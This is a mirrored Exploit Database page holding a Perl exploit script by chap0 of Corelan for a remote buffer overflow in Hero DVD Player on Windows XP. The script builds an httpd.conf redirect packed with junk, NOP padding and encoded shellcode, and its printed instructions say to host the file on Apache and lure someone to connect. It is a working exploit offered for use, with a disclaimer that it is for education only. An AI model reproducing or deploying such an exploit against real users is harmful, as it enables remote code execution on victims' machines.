Hero DVD Remote 1.0 – Remote Buffer Overflow

• Exploit Database
• 110 阅读

• 作者： chap0
  日期： 2010-07-07
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14257/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50

  # Exploit Title : Hero DVD Remote Buffer Overflow Exploit # Date: July 7, 2010 # Author: chap0 [www.seek-truth.net] # Software Link : http://download.cnet.com/Hero-DVD-Player/3000-7970_4-10127412.html # Version : 3.0.8 # OS: Windows XP SP3 # Greetz to : God the Creator, Sud0 (Thanks Bro for the Support) # The Crew : http://www.corelan.be:8800/index.php/security/corelan-team-members/ # Advisory : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-056 # # Script provided &apos;as is&apos;, without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # Corelan does not want anyone to use this script # for malicious and/or illegal purposes # Corelan cannot be held responsible for any illegal use. # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # Code : print "|------------------------------------------------------------------|\n"; print "| __ __|\n"; print "| _________________/ /___ _____ / /________ _____ ___|\n"; print "|/ ___/ __ \\/ ___/ _ \\/ / __ <code>/ __ \\ / __/ _ \\/ __ </code>/ __ `__ \\ |\n"; print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |\n"; print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/|\n"; print "||\n"; print "| http://www.corelan.be:8800 |\n"; print "||\n"; print "|-------------------------------------------------[ EIP Hunters ]--|\n\n"; print "[*] Hero DVD Player Remote Exploit by chap0.\n"; print "[*] Visit Corelan.be port 8800, Preparing Payload . . .\n"; sleep(3);   my $file = "httpd.conf";   $code = "Redirect permanent /sploit http://"; $junk = "A" x 128; $more = "yH2X" ; # alpha value for "yH2X" = 0x58324879 from msg723.acm $nops = "\x42" x 24; #Padding #message box code $shell = "TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIN9JKMK9IRTWTL401N2OB2ZVQXISTLKBQ6PLKRVDLLKT65LLKPF5XLKSNWPLKWFWH0OUHRUL3PYEQ8QKOKQSPLKRLGT7TLKQUGLLK645URX5QKZLKQZ28LKPZQ0EQZKKSVW79LKGDLKEQJNVQKOP1IPKLNLK4O03DUZO1HOTM5QYWKYJQKOKOKO7K3LVD18D59NLKPZVDS1JKU6LKTLPKLK1J5L5QZKLK34LKUQKXMYQTWT5L3QHCNRTHGYN4K9KUMYIRE8LNPNTNZLPRKXMLKOKOKOMYPE5TOKSNYHKRBSMW5L14QBKXLKKOKOKOMYQUS83XBLBLGPKOSX6SP2FNE4SXRUT33U3BLHQL14UZLIJFPVKO65TDLIO20POKOXORPMOLMWEL7TPRKX1NKOKOKO3XSBSUD7V8E8BLSQRNW3U8QSRO2RCUVQ9KMXQLWT4KMYM3U82TU8687PSXWPQDRRD5RH0SRESUBK6Q9YLHPL145ZLIM1VQN2F2PSV1PRKOHPP1O060KO0UUXTJA";   open(FILE,">$file"); print FILE $code.$junk.$more.$nops.$shell; close(FILE);   print "[*] Use Backtrack! place httpd.conf in /etc/apache2/ and start apache.\n"; print "[*] Have Someone Connect to your Server /sploit.\n";